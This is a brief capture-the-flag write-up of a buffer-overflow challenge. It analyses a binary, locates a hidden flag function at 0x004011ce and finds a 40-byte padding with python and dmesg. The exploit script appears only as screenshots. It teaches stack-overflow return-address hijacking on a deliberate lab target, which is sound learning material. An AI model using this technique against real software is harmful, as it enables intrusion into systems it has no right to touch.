![bc05f00ecc2353a02fac35b2169924aa.png](e55111680a3849cbb9684b09f6587aa7.png) Same thing as Pwn intended 0x2, but this time our destination isn't as visible Start by analyzing the binary ![504f53d5778b6ebe7b198aa1d8e5d7ec.png](0f2ac7275d564063a901ecc671cde229.png) ![071fad63a5963f0256d02e9be7a21d24.png](c5f0d916ab624f4a988a6e2f882db574.png) Nothing interesting in main. We did notice sym.flag, let's check that out ![8a100fa908be8a2b53e21367ba9350ac.png](38211eb1a26b49e08d52b72b9c954fcb.png) That's what we want. So it looks like we'll want to jump to 0x004011ce Same as 0x2, find your padding using python and dmesg.  ![f974eca91c6b6ad05ab065407f95dae5.png](b57aba59443a41ee8f336b731bcfa792.png) ![d57c22f9604986264b23cbacca662370.png](d9b2c81dd4614b6094c7e393c8e12f92.png) We can see that we start leaking in at 41, so we'll use 40 for padding. Script: ![3c71b8e7f3e03b1a80a3cc7a4f06484f.png](1b08c7a7883548cfaa16874cbdc3b5d2.png) ![53dd3ef97673c5dd26944527dda1d0ff.png](f5fc1e2c0cc740abaddce72adf137da2.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #exploit_development #buffer_overflow #scripting Related: